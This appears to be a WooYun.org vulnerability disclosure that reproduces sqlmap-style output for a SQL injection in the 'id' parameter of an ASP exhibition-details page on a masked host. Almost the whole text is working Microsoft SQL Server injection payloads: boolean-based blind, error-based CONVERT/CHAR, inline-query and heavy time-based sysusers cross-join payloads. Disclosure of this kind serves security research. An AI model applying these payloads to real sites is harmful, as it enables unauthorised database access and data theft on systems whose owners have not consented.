WooYun.org

http://**.**.**.**/exhibitionDetail.asp?id=3253
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3253 AND 6053=6053
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=3253 AND 1065=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1065=1065) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=3253 AND 2957=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)